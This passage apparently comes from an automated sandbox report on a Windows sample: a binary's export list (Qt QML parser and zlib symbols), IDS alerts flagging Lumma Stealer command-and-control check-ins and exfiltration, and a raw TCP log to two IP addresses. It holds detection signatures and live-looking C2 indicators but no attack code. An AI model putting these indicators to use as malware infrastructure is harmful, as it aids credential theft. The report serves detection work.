                                                                                                          ?lastSourceLocation@TildeExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7460x7b2a00
                                                                                                          ?lastSourceLocation@TrueLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7470x7b26b0
                                                                                                          ?lastSourceLocation@TryStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7480x7b27a0
                                                                                                          ?lastSourceLocation@TypeOfExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7490x7b2a00
                                                                                                          ?lastSourceLocation@UiArrayBinding@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7500x7b26a0
                                                                                                          ?lastSourceLocation@UiArrayMemberList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7510x7b27f0
                                                                                                          ?lastSourceLocation@UiHeaderItemList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7520x7b2750
                                                                                                          ?lastSourceLocation@UiImport@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7530x7b2820
                                                                                                          ?lastSourceLocation@UiObjectBinding@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7540x7b2830
                                                                                                          ?lastSourceLocation@UiObjectDefinition@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7550x7b2850
                                                                                                          ?lastSourceLocation@UiObjectInitializer@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7560x7b2690
                                                                                                          ?lastSourceLocation@UiObjectMemberList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7570x7b27f0
                                                                                                          ?lastSourceLocation@UiParameterList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7580x7b2870
                                                                                                          ?lastSourceLocation@UiPragma@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7590x7b2690
                                                                                                          ?lastSourceLocation@UiProgram@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7600x7b28c0
                                                                                                          ?lastSourceLocation@UiPublicMember@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7610x7b2920
                                                                                                          ?lastSourceLocation@UiQualifiedId@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7620x7b2960
                                                                                                          ?lastSourceLocation@UiQualifiedPragmaId@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7630x7b2960
                                                                                                          ?lastSourceLocation@UiScriptBinding@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7640x7b2550
                                                                                                          ?lastSourceLocation@UiSourceElement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7650x7b29b0
                                                                                                          ?lastSourceLocation@UnaryMinusExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7660x7b2a00
                                                                                                          ?lastSourceLocation@UnaryPlusExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7670x7b2a00
                                                                                                          ?lastSourceLocation@VariableDeclaration@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7680x7b2a20
                                                                                                          ?lastSourceLocation@VariableDeclarationList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7690x7b2a70
                                                                                                          ?lastSourceLocation@VariableStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7700x7b2690
                                                                                                          ?lastSourceLocation@VoidExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7710x7b2a00
                                                                                                          ?lastSourceLocation@WhileStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7720x7b2550
                                                                                                          ?lastSourceLocation@WithStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7730x7b2550
                                                                                                          ?lex@Lexer@QQmlJS@@QAEHXZ7740x8b24d0
                                                                                                          ?lexer@Engine@QQmlJS@@QBEPAVLexer@2@XZ7750x80cc10
                                                                                                          ?loc@Parser@QQmlJS@@IAEAAVSourceLocation@AST@2@H@Z7760x7c9770
                                                                                                          ?midRef@Engine@QQmlJS@@QAE?AVQStringRef@@HH@Z7770x7b2a90
                                                                                                          ?newStringRef@Engine@QQmlJS@@QAE?AVQStringRef@@ABVQString@@@Z7780x8b0c70
                                                                                                          ?newStringRef@Engine@QQmlJS@@QAE?AVQStringRef@@PBVQChar@@H@Z7790x8b0cb0
                                                                                                          ?parse@Parser@QQmlJS@@IAE_NH@Z7800x88cdd0
                                                                                                          ?parse@Parser@QQmlJS@@QAE_NXZ7810x7c9990
                                                                                                          ?parseExpression@Parser@QQmlJS@@QAE_NXZ7820x7c99a0
                                                                                                          ?parseProgram@Parser@QQmlJS@@QAE_NXZ7830x7c99b0
                                                                                                          ?parseSourceElement@Parser@QQmlJS@@QAE_NXZ7840x7c99c0
                                                                                                          ?parseStatement@Parser@QQmlJS@@QAE_NXZ7850x7c99d0
                                                                                                          ?parseUiObjectMember@Parser@QQmlJS@@QAE_NXZ7860x7c99e0
                                                                                                          ?pool@Engine@QQmlJS@@QAEPAVMemoryPool@2@XZ7870x8b0d70
                                                                                                          ?postVisit@Visitor@AST@QQmlJS@@UAEXPAVNode@23@@Z7880x7b1f70
                                                                                                          ?pragmaLibrary@Directives@QQmlJS@@UAEXXZ7890x8e10b0
                                                                                                          ?preVisit@Visitor@AST@QQmlJS@@UAE_NPAVNode@23@@Z7900x7b3680
                                                                                                          ?prevTerminator@Lexer@QQmlJS@@QBE_NXZ7910x8b2600
                                                                                                          ?qmlMode@Lexer@QQmlJS@@QBE_NXZ7920x8b2610
                                                                                                          ?reallocateStack@Parser@QQmlJS@@IAEXXZ7930x891a60
                                                                                                          ?regExpFlags@Lexer@QQmlJS@@QBEHXZ7940x6b09e0
                                                                                                          ?regExpPattern@Lexer@QQmlJS@@QBE?AVQString@@XZ7950x55d040
                                                                                                          ?reparseAsQualifiedId@Parser@QQmlJS@@IAEPAVUiQualifiedId@AST@2@PAVExpressionNode@42@@Z7960x891ad0
                                                                                                          ?reparseAsQualifiedPragmaId@Parser@QQmlJS@@IAEPAVUiQualifiedPragmaId@AST@2@PAVExpressionNode@42@@Z7970x891cf0
                                                                                                          ?reset@MemoryPool@QQmlJS@@QAEXXZ7980x7b2ea0
                                                                                                          ?rootNode@Parser@QQmlJS@@QBEPAVNode@AST@2@XZ7990x819090
                                                                                                          ?scanChar@Lexer@QQmlJS@@AAEXXZ8000x8b26b0
                                                                                                          ?scanDirectives@Lexer@QQmlJS@@QAE_NPAVDirectives@2@@Z8010x8b2760
                                                                                                          ?scanNumber@Lexer@QQmlJS@@AAEHVQChar@@@Z8020x8b2c90
                                                                                                          ?scanRegExp@Lexer@QQmlJS@@QAE_NW4RegExpBodyPrefix@12@@Z8030x8b3380
                                                                                                          ?scanToken@Lexer@QQmlJS@@AAEHXZ8040x8b39f0
                                                                                                          ?setCode@Engine@QQmlJS@@QAEXABVQString@@@Z8050x8b0d80
                                                                                                          ?setCode@Lexer@QQmlJS@@QAEXABVQString@@H_N@Z8060x8b4ab0
                                                                                                          ?setLexer@Engine@QQmlJS@@QAEXPAVLexer@2@@Z8070x8b0d90
                                                                                                          ?statement@Parser@QQmlJS@@QBEPAVStatement@AST@2@XZ8080x7ca040
                                                                                                          ?statementCast@Node@AST@QQmlJS@@UAEPAVStatement@23@XZ8090x881d50
                                                                                                          ?statementCast@Statement@AST@QQmlJS@@UAEPAV123@XZ8100x8ac730
                                                                                                          ?stringRef@Parser@QQmlJS@@IAEAAVQStringRef@@H@Z8110x7ca050
                                                                                                          ?sym@Parser@QQmlJS@@IAEAATValue@12@H@Z8120x7ca070
                                                                                                          ?syncProhibitAutomaticSemicolon@Lexer@QQmlJS@@AAEXXZ8130x8b4c30
                                                                                                          ?tokenEndColumn@Lexer@QQmlJS@@QBEHXZ8140x8b4c50
                                                                                                          ?tokenEndLine@Lexer@QQmlJS@@QBEHXZ8150x8b4c60
                                                                                                          ?tokenKind@Lexer@QQmlJS@@QBEHXZ8160x7ca090
                                                                                                          ?tokenLength@Lexer@QQmlJS@@QBEHXZ8170x7ca0a0
                                                                                                          ?tokenOffset@Lexer@QQmlJS@@QBEHXZ8180x7ca0b0
                                                                                                          ?tokenSpell@Lexer@QQmlJS@@QBE?AVQStringRef@@XZ8190x7ca0c0
                                                                                                          ?tokenStartColumn@Lexer@QQmlJS@@QBEHXZ8200x7ca0e0
                                                                                                          ?tokenStartLine@Lexer@QQmlJS@@QBEHXZ8210x80a310
                                                                                                          ?tokenText@Lexer@QQmlJS@@QBE?AVQString@@XZ8220x8b4c70
                                                                                                          ?tokenValue@Lexer@QQmlJS@@QBENXZ8230x7ca0f0
                                                                                                          ?uiObjectMember@Parser@QQmlJS@@QBEPAVUiObjectMember@AST@2@XZ8240x7ca100
                                                                                                          ?uiObjectMemberCast@Node@AST@QQmlJS@@UAEPAVUiObjectMember@23@XZ8250x881d50
                                                                                                          ?uiObjectMemberCast@UiObjectMember@AST@QQmlJS@@UAEPAV123@XZ8260x8ac730
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVArgumentList@23@@Z8270x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVArrayLiteral@23@@Z8280x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVArrayMemberExpression@23@@Z8290x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVBinaryExpression@23@@Z8300x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVBlock@23@@Z8310x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVBreakStatement@23@@Z8320x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVCallExpression@23@@Z8330x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVCaseBlock@23@@Z8340x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVCaseClause@23@@Z8350x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVCaseClauses@23@@Z8360x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVCatch@23@@Z8370x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVConditionalExpression@23@@Z8380x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVContinueStatement@23@@Z8390x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVDebuggerStatement@23@@Z8400x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVDefaultClause@23@@Z8410x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVDeleteExpression@23@@Z8420x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVDoWhileStatement@23@@Z8430x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVElementList@23@@Z8440x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVElision@23@@Z8450x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVEmptyStatement@23@@Z8460x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVExpression@23@@Z8470x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVExpressionStatement@23@@Z8480x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVFalseLiteral@23@@Z8490x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVFieldMemberExpression@23@@Z8500x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVFinally@23@@Z8510x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVForEachStatement@23@@Z8520x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVForStatement@23@@Z8530x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVFormalParameterList@23@@Z8540x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVFunctionBody@23@@Z8550x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVFunctionDeclaration@23@@Z8560x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVFunctionExpression@23@@Z8570x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVFunctionSourceElement@23@@Z8580x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVIdentifierExpression@23@@Z8590x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVIdentifierPropertyName@23@@Z8600x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVIfStatement@23@@Z8610x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVLabelledStatement@23@@Z8620x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVLocalForEachStatement@23@@Z8630x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVLocalForStatement@23@@Z8640x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVNestedExpression@23@@Z8650x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVNewExpression@23@@Z8660x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVNewMemberExpression@23@@Z8670x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVNotExpression@23@@Z8680x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVNullExpression@23@@Z8690x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVNumericLiteral@23@@Z8700x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVNumericLiteralPropertyName@23@@Z8710x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVObjectLiteral@23@@Z8720x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVPostDecrementExpression@23@@Z8730x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVPostIncrementExpression@23@@Z8740x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVPreDecrementExpression@23@@Z8750x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVPreIncrementExpression@23@@Z8760x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVProgram@23@@Z8770x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVPropertyAssignmentList@23@@Z8780x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVPropertyGetterSetter@23@@Z8790x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVPropertyNameAndValue@23@@Z8800x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVRegExpLiteral@23@@Z8810x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVReturnStatement@23@@Z8820x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVSourceElements@23@@Z8830x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVStatementList@23@@Z8840x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVStatementSourceElement@23@@Z8850x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVStringLiteral@23@@Z8860x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVStringLiteralPropertyName@23@@Z8870x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVSwitchStatement@23@@Z8880x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVThisExpression@23@@Z8890x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVThrowStatement@23@@Z8900x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVTildeExpression@23@@Z8910x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVTrueLiteral@23@@Z8920x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVTryStatement@23@@Z8930x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVTypeOfExpression@23@@Z8940x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiArrayBinding@23@@Z8950x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiArrayMemberList@23@@Z8960x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiHeaderItemList@23@@Z8970x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiImport@23@@Z8980x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiObjectBinding@23@@Z8990x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiObjectDefinition@23@@Z9000x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiObjectInitializer@23@@Z9010x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiObjectMemberList@23@@Z9020x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiParameterList@23@@Z9030x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiPragma@23@@Z9040x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiProgram@23@@Z9050x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiPublicMember@23@@Z9060x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiQualifiedId@23@@Z9070x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiQualifiedPragmaId@23@@Z9080x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiScriptBinding@23@@Z9090x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUiSourceElement@23@@Z9100x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUnaryMinusExpression@23@@Z9110x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVUnaryPlusExpression@23@@Z9120x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVVariableDeclaration@23@@Z9130x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVVariableDeclarationList@23@@Z9140x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVVariableStatement@23@@Z9150x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVVoidExpression@23@@Z9160x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVWhileStatement@23@@Z9170x7b3680
                                                                                                          ?visit@Visitor@AST@QQmlJS@@UAE_NPAVWithStatement@23@@Z9180x7b3680
                                                                                                          z_adler329190xd0e300
                                                                                                          z_adler32_combine9200xd0e570
                                                                                                          z_adler32_combine649210xd0e570
                                                                                                          z_compress9220xd15ea0
                                                                                                          z_compress29230xd15ec0
                                                                                                          z_compressBound9240xd15f70
                                                                                                          z_crc329250xd0ea20
                                                                                                          z_crc32_combine9260xd0ea40
                                                                                                          z_crc32_combine649270xd0ea40
                                                                                                          z_deflate9280xd08490
                                                                                                          z_deflateBound9290xd08cd0
                                                                                                          z_deflateCopy9300xd08db0
                                                                                                          z_deflateEnd9310xd08f60
                                                                                                          z_deflateInit2_9320xd09030
                                                                                                          z_deflateInit_9330xd09260
                                                                                                          z_deflateParams9340xd09290
                                                                                                          z_deflatePrime9350xd09380
                                                                                                          z_deflateReset9360xd093c0
                                                                                                          z_deflateSetDictionary9370xd09480
                                                                                                          z_deflateSetHeader9380xd09570
                                                                                                          z_deflateTune9390xd095a0
                                                                                                          z_get_crc_table9400xd0ea50
                                                                                                          z_inflate9410xd04be0
                                                                                                          z_inflateCopy9420xd06290
                                                                                                          z_inflateEnd9430xd063f0
                                                                                                          z_inflateGetHeader9440xd06440
                                                                                                          z_inflateInit2_9450xd06470
                                                                                                          z_inflateInit_9460xd06530
                                                                                                          z_inflateMark9470xd06550
                                                                                                          z_inflatePrime9480xd065b0
                                                                                                          z_inflateReset9490xd06620
                                                                                                          z_inflateReset29500xd066d0
                                                                                                          z_inflateSetDictionary9510xd06760
                                                                                                          z_inflateSync9520xd06840
                                                                                                          z_inflateSyncPoint9530xd06920
                                                                                                          z_inflateUndermine9540xd06950
                                                                                                          z_uncompress9550xd15f90
                                                                                                          z_zError9560xd70530
                                                                                                          z_zlibCompileFlags9570xd70570
                                                                                                          z_zlibVersion9580xd70580
                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-12-13T16:48:32.535328+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949759172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:33.621155+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949759172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:33.621155+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949759172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:34.907796+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949765172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:35.644593+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949765172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:35.644593+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949765172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:37.234976+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949771172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:38.007977+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949771172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:39.351048+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949777172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:41.878343+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949783172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:44.254581+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949789172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:46.733955+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949796172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:51.077620+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949807172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:52.094534+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949807172.67.149.196443TCP
                                                                                                          2024-12-13T16:48:53.767762+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949813172.67.182.135443TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 13, 2024 16:48:31.309808016 CET49759443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:31.309851885 CET44349759172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:31.310105085 CET49759443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:31.313486099 CET49759443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:31.313507080 CET44349759172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:32.535243988 CET44349759172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:32.535327911 CET49759443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:32.536966085 CET49759443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:32.536977053 CET44349759172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:32.537287951 CET44349759172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:32.584176064 CET49759443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:32.592560053 CET49759443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:32.592591047 CET49759443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:32.592725039 CET44349759172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:33.621164083 CET44349759172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:33.621274948 CET44349759172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:33.621371984 CET49759443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:33.623483896 CET49759443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:33.623506069 CET44349759172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:33.692152023 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:33.692198038 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:33.692295074 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:33.692593098 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:33.692606926 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:34.907582998 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:34.907795906 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:34.942708015 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:34.942728996 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:34.943070889 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:34.945593119 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:34.945674896 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:34.945693970 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.644604921 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.644663095 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.644690990 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.644722939 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.644738913 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.644750118 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.644773006 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.644779921 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.644813061 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.645035028 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.645040989 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.645262003 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.652985096 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.661452055 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.661526918 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.661555052 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.661570072 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.661783934 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.764801979 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.818567991 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.836771011 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.840409994 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.840447903 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.840552092 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.840590954 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.840632915 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.840852022 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.840852022 CET49765443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.840873003 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.840884924 CET44349765172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.979933023 CET49771443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.979979038 CET44349771172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:35.980045080 CET49771443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.980556965 CET49771443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:35.980572939 CET44349771172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:37.234801054 CET44349771172.67.149.196192.168.2.9
